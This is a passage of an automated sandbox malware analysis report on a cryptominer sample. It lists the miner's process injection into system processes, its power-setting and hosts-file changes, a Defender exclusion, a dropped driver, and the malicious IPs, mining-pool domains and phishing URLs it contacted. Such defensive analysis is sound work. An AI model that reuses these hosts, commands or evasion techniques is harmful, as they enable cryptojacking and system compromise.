            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,25_2_0000000140001B54
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BC7960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,31_2_000001F385BC7960
            Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Modifies power options to not sleep / hibernate
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Modifies the hosts file
            Source: C:\Users\user\Desktop\file.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            File and Directory Permissions Modification            		1
            Credential API Hooking            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Native API            		11
            Windows Service            		1
            Access Token Manipulation            		1
            Disable or Modify Tools            		LSASS Memory1
            File and Directory Discovery            		Remote Desktop Protocol1
            Credential API Hooking            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Service Execution            		Logon Script (Windows)11
            Windows Service            		1
            Obfuscated Files or Information            		Security Account Manager24
            System Information Discovery            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook713
            Process Injection            		1
            DLL Side-Loading            		NTDS331
            Security Software Discovery            		Distributed Component Object ModelInput Capture2
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            File Deletion            		LSA Secrets2
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
            Rootkit            		Cached Domain Credentials131
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Masquerading            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
            Virtualization/Sandbox Evasion            		Proc Filesystem1
            Remote System Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Access Token Manipulation            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron713
            Process Injection            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Hidden Files and Directories            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549199 Sample: file.exe Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 57 monerooceans.stream 2->57 59 gulf.moneroocean.stream 2->59 67 Suricata IDS alerts for network traffic 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 Yara detected Xmrig cryptocurrency miner 2->71 73 9 other signatures 2->73 8 file.exe 1 3 2->8         started        12 updater.exe 1 2->12         started        signatures3 process4 file5 51 C:\ProgramDatabehaviorgraphoogle\Chrome\updater.exe, PE32+ 8->51 dropped 53 C:\Windows\System32\drivers\etc\hosts, ASCII 8->53 dropped 75 Uses powercfg.exe to modify the power settings 8->75 77 Modifies the context of a thread in another process (thread injection) 8->77 79 Modifies the hosts file 8->79 81 Modifies power options to not sleep / hibernate 8->81 14 dialer.exe 1 8->14         started        17 powershell.exe 23 8->17         started        19 cmd.exe 1 8->19         started        28 13 other processes 8->28 55 C:\Windows\Temp\lwouyklykeoh.sys, PE32+ 12->55 dropped 83 Multi AV Scanner detection for dropped file 12->83 85 Adds a directory exclusion to Windows Defender 12->85 87 Sample is not signed and drops a device driver 12->87 21 dialer.exe 12->21         started        23 dialer.exe 12->23         started        26 powershell.exe 23 12->26         started        30 11 other processes 12->30 signatures6 process7 dnsIp8 89 Contains functionality to inject code into remote processes 14->89 91 Writes to foreign memory regions 14->91 93 Allocates memory in foreign processes 14->93 95 Contains functionality to compare user and computer (likely to detect sandboxes) 14->95 32 lsass.exe 14->32 injected 35 winlogon.exe 14->35 injected 41 2 other processes 14->41 97 Loading BitLocker PowerShell Module 17->97 37 conhost.exe 17->37         started        43 2 other processes 19->43 99 Injects code into the Windows Explorer (explorer.exe) 21->99 101 Creates a thread in another existing process (thread injection) 21->101 103 Injects a PE file into a foreign processes 21->103 45 4 other processes 21->45 61 162.230.48.189, 49768, 49984, 80 ATT-INTERNET4US United States 23->61 63 monerooceans.stream 149.102.143.109, 20128, 49762, 49806 COGENT-174US United States 23->63 105 Query firmware table information (likely to detect VMs) 23->105 39 conhost.exe 26->39         started        47 13 other processes 28->47 49 11 other processes 30->49 signatures9 process10 signatures11 65 Writes to foreign memory regions 32->65

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\ProgramData\Google\Chrome\updater.exe55%ReversingLabsWin64.Trojan.Generic
            C:\Windows\Temp\lwouyklykeoh.sys5%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://162.230.48.189/api/endpoint.php0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            s-part-0017.t-0009.fb-t-msedge.net
            		13.107.253.45
            		truefalse
              		high
              monerooceans.stream
              		149.102.143.109
              		truefalse
                		high
                gulf.moneroocean.stream
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://162.230.48.189/api/endpoint.phptrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://schemas.xmlsoap.org/wsdl/soap12/Plsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    162.230.48.189
                                    		unknownUnited States
                                    		7018ATT-INTERNET4UStrue
                                    149.102.143.109
                                    		monerooceans.streamUnited States
                                    		174COGENT-174USfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1549199
                                    Start date and time:2024-11-05 12:23:34 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 30s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:62
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:8
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:file.exe
                                    Detection:MAL
                                    Classification:mal100.adwa.spyw.evad.mine.winEXE@90/13@1/2
                                    EGA Information:
                                    • Successful, ratio: 85.7%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                    • Excluded IPs from analysis (whitelisted): 40.126.32.68, 20.190.160.20, 40.126.32.138, 40.126.32.74, 40.126.32.72, 40.126.32.76, 20.190.160.22, 40.126.32.136
                                    • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, otelrules.afd.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, azureedge-t-prod.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                    • Execution Graph export aborted for target file.exe, PID 7612 because it is empty
                                    • Execution Graph export aborted for target updater.exe, PID 3760 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • VT rate limit hit for: file.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    06:24:23API Interceptor1x Sleep call for process: file.exe modified
                                    06:24:25API Interceptor32x Sleep call for process: powershell.exe modified
                                    06:25:02API Interceptor369457x Sleep call for process: winlogon.exe modified
                                    06:25:03API Interceptor291106x Sleep call for process: lsass.exe modified
                                    06:25:03API Interceptor1679x Sleep call for process: svchost.exe modified
                                    06:25:05API Interceptor346510x Sleep call for process: dwm.exe modified
                                    06:25:06API Interceptor2021x Sleep call for process: dialer.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    162.230.48.189file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                    • 162.230.48.189/IDEK.exe
                                    149.102.143.109file.exeGet hashmaliciousXmrigBrowse
                                      file.exeGet hashmaliciousXmrigBrowse
                                        file.exeGet hashmaliciousXmrigBrowse
                                          MenSncKnTI.exeGet hashmaliciousXmrigBrowse
                                            SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeGet hashmaliciousXmrigBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              s-part-0017.t-0009.fb-t-msedge.nethttps://www.supercontable.es/emailing/track_superc.php?Destino=!:%7D%7D%7C.pepeworld.pro/c2VyZ2lvLmFsdmFyZXpAdG90YWxlbmVyZ2llcy5jb20=&IdTracking=03397&user=964998racking=10419&user=081904Get hashmaliciousPhisherBrowse
                                              • 13.107.253.45
                                              file.exeGet hashmaliciousLummaC, XWormBrowse
                                              • 13.107.253.45
                                              2407821277133588494.jsGet hashmaliciousStrela DownloaderBrowse
                                              • 13.107.253.45
                                              rFactura02Presupuesto_9209Urbia_pdf_.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 13.107.253.45
                                              De_posit Confirmati0n_ Mitie.htmlGet hashmaliciousUnknownBrowse
                                              • 13.107.253.45
                                              https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XSwDnNeW8yycT&sa=t&esrc=nNeW8FA0xys8Em2FL&source=&cd=tS6T8Tiw9XH&cad=XpPkDfJXVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=am%70%2F%77%77%77%2E%64%65%72%79%61%6E%63%6F%6E%73%75%6C%74%69%6E%67%2E%63%6F%6D%2F%74%31%62%72%6F%77%6E%34%35%2F1112449584/aGVsZW5AY3VyZXBhcmtpbnNvbnMub3JnLnVrGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                              • 13.107.253.45
                                              https://astonishing-maize-sunstone.glitch.me/Get hashmaliciousUnknownBrowse
                                              • 13.107.253.45
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                              • 13.107.253.45
                                              https://t.ly/UEfhCGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                              • 13.107.253.45
                                              https://wordtohtml.net/user_files/244701_d6db22759e351980/414618_dailyfeedback.htmlGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                              • 13.107.253.45
                                              monerooceans.streamfile.exeGet hashmaliciousXmrigBrowse
                                              • 149.102.143.109
                                              file.exeGet hashmaliciousXmrigBrowse
                                              • 149.102.143.109
                                              file.exeGet hashmaliciousXmrigBrowse
                                              • 149.102.143.109
                                              MenSncKnTI.exeGet hashmaliciousXmrigBrowse
                                              • 149.102.143.109
                                              SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeGet hashmaliciousXmrigBrowse
                                              • 149.102.143.109
                                              MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zipGet hashmaliciousXmrigBrowse
                                              • 44.196.193.227
                                              17ae2fbf36a41622374adfd3b1608e08.10.drGet hashmaliciousUnknownBrowse
                                              • 44.224.209.130
                                              SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeGet hashmaliciousXmrigBrowse
                                              • 44.196.193.227
                                              GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                              • 44.196.193.227
                                              yljlbesdmoas.exeGet hashmaliciousXmrigBrowse
                                              • 44.196.193.227

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              COGENT-174USx86_32.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 38.46.60.56
                                              debug.dbg.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 38.230.129.99
                                              m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 38.60.249.4
                                              mpsl.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 198.242.133.219
                                              arm7.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 207.234.30.241
                                              ppc.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 165.254.178.168
                                              file.exeGet hashmaliciousXmrigBrowse
                                              • 149.102.143.109
                                              DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                              • 154.23.184.95
                                              ppc.elfGet hashmaliciousMiraiBrowse
                                              • 154.42.69.237
                                              mpsl.elfGet hashmaliciousMiraiBrowse
                                              • 38.116.142.107
                                              ATT-INTERNET4USmips.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 107.79.77.99
                                              debug.dbg.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 75.8.57.251
                                              x86_64.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 107.209.73.178
                                              mpsl.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 75.27.117.62
                                              arm.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 12.21.247.229
                                              arm7.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 107.115.230.8
                                              sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 107.68.208.185
                                              ppc.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 12.105.138.198
